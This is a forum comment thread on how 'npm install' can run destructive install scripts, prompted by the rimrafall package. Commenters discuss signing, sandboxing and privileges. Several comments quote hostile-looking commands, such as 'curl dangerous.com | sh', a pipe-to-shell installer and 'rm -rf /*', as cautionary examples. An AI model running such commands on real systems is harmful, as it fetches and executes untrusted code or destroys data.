Npm install could be dangerous

This applies to pretty much every pkg manager ever created.<p>That&#x27;s why it&#x27;s important to have end-to-end package signing with a reasonable UI, so people can choose to selectively trust the sources they need and get alerted <i>before</i> new dependencies get pulled in.<p>Sadly I don&#x27;t know of any pkg manager that implements this correctly.

If you run npm with root, npm will run scripts with the user &quot;nobody&quot; by default. This means that npm doesn&#x27;t run scripts as root even if you run &quot;npm install&quot; with root.<p>You can set another user instead of nobody with the &quot;user&quot; option and you can disable switching UID&#x2F;GID using the &quot;unsafe-perm&quot; option but DO NOT DO THIS.<p>More information here: <a href="https://docs.npmjs.com/misc/config" rel="nofollow">https:&#x2F;&#x2F;docs.npmjs.com&#x2F;misc&#x2F;config</a><p>edit: added more details.

This is exactly why i think modern kernel level security layers, such as FreeBSD jails (or Docker&#x2F;LXC) were born. Provided your app runs within a jail, it wouldn&#x27;t matter much anymore:<p>&gt; Once inside the jail, a process is not permitted to escape outside of this subtree<p>You could also develop within isolation, therefore your development env would be safer and even similar to a production environment. Needless to say, that has additional benefits.

npmjs still contains the package: <a href="https://www.npmjs.com/search?q=rimrafall" rel="nofollow">https:&#x2F;&#x2F;www.npmjs.com&#x2F;search?q=rimrafall</a> <a href="https://www.npmjs.com/package/rimrafall" rel="nofollow">https:&#x2F;&#x2F;www.npmjs.com&#x2F;package&#x2F;rimrafall</a><p>&#x27;0 downloads in the last month&#x27;<p>There is no &#x27;report package&#x27; button. The support link goes to a &#x27;we are hiring&#x27; contact form. Report bad packages as security issues? <a href="https://www.npmjs.com/security" rel="nofollow">https:&#x2F;&#x2F;www.npmjs.com&#x2F;security</a><p>Package signing. Review process. Scanning tools for dangerous packages. As a user, don&#x27;t trust anything and isolate containers and jails. Ban bad actors. Charge for a curated package index.<p>Lots of other plugin stores do better than npm.

&gt; […] as dangerous as `curl dangerous.com | sh`.<p>dangerous.com appears to be a saucy outfits retailer. Irrespective of the name, piping the html to sh is probably fine.

It&#x27;s always been amateur hour over there. The &#x27;official&#x27; install was `curl <a href="http://npmjs.org/install.sh" rel="nofollow">http:&#x2F;&#x2F;npmjs.org&#x2F;install.sh</a> | sh`[1], package checksums aren&#x27;t uniformly checked, the list goes on.<p>But don&#x27;t worry guys, they had a security audit[2].<p>[1] <a href="http://web.archive.org/web/20101228041356/http://npmjs.org/" rel="nofollow">http:&#x2F;&#x2F;web.archive.org&#x2F;web&#x2F;20101228041356&#x2F;http:&#x2F;&#x2F;npmjs.org&#x2F;</a> [2] <a href="http://blog.npmjs.org/post/80277229932/newly-paranoid-maintainers" rel="nofollow">http:&#x2F;&#x2F;blog.npmjs.org&#x2F;post&#x2F;80277229932&#x2F;newly-paranoid-mainta...</a>

I could just as easily embed something like that in any code on any open source project in any language as part of the installer or the main code base.

Somehow I feel like using something that just simulates rm -rf &#x2F;* would have brought the point across just as well and a bit safer...

Just another reason to install nodejs with a node versioning machine like nvm or n... or to chown your &#x2F;usr dir so you don&#x27;t have to run sudo every time you want to npm install. Since you need super user privileges to accidentally remove your system on most linux distros, it really helps if you don&#x27;t form the habit of sudo npm installing everything.

Any package manager, especially one with fuzzy matching is extremely dangerous. Every time you do an install you are often pulling hundreds of modules from many many places. If any one of the codebases of a module were compromised even by a sneaky contributor, you could inject arbitrary code into any companies codebase&#x2F;runtime.<p>Until object capability type systems become more popular, this will always be an issue. Unless you hand audit everything. Good luck being productive doing that, if you even have the skills or team members able to audit code.

It&#x27;s not just Npm, RubyGems has essentially the same issue. I think the real lesson is &quot;be careful what you install&quot;.

This is a problem with most&#x2F;all lib installers. They tend to have hooks to allow post-install actions and those hooks tend to be able to run OS commands, with the privileges of the installing user.<p>Of course what&#x27;s extra worrying is it&#x27;s not just the libs you directly install, but all their dependencies which get to carry out these actions. So for example when you install rails, it will install quite a large number of subsidiary gems.<p>Then when you add in the fact that the credentials that control dev access to push to places like rubygems and npm are just static username&#x2F;password combos (which sometimes get stored in plain text in a dot file in the developers home dir) and that there&#x27;s no common use of digital signing for issued libs (in some cases the installers don&#x27;t even support it).

There are some things you can do to make `rm` safer which would prevent this from working: <a href="https://github.com/sindresorhus/guides/blob/master/how-not-to-rm-yourself.md#safeguard-rm" rel="nofollow">https:&#x2F;&#x2F;github.com&#x2F;sindresorhus&#x2F;guides&#x2F;blob&#x2F;master&#x2F;how-not-t...</a><p>Though the real fix is doing development in a sandboxed container.

<a href="https://github.com/joaojeronimo/rimrafall/issues/2" rel="nofollow">https:&#x2F;&#x2F;github.com&#x2F;joaojeronimo&#x2F;rimrafall&#x2F;issues&#x2F;2</a> hehehe

So this doesn&#x27;t strike me as an npm issue but something more fundamental: there is no easy way on any platform to define a set of rules for processes I invoke via the command line.<p>Like, it would be really really nice if I could wrap npm so it can only write to $HOME&#x2F;.npm, &#x2F;tmp and the current working directory - but I know of no system which will currently let me do that suitably dynamically.

Slight OT: does anyone know of any hacking&#x2F;malware campaigns that were specifically aimed at developers (but not against a specific company)? Normal trojans sometimes steal game keys, I could imagine searching the disk for AWS keys might be profitable, too?

Computing could be dangerous.

More of a joke but:<p>npm install virus.exe<p>Perfect for the #scalenpm tshirts<p><a href="https://github.com/peny/virus.exe" rel="nofollow">https:&#x2F;&#x2F;github.com&#x2F;peny&#x2F;virus.exe</a>

awareness for this is always good many now just have scripts doing curl blah | sudo and expecting the blah url will always serve the content they expect. signed versions seems to be the current best way to not have problems, even thus its not perfect.<p>And of course, most things like npm either dont support this or dont support it well, or nobody cares about it

Well, under no circumstance should you run npm, nvm, rvm, rbenv, pip, etc as root.

&gt; can be as dangerous as curl dangerous.com | sh<p>What&#x27;s <i>dangerous.com</i>?

it would be cool if there was a way to show which commands npm was running in its scripts.

Can I do the same with Makefiles?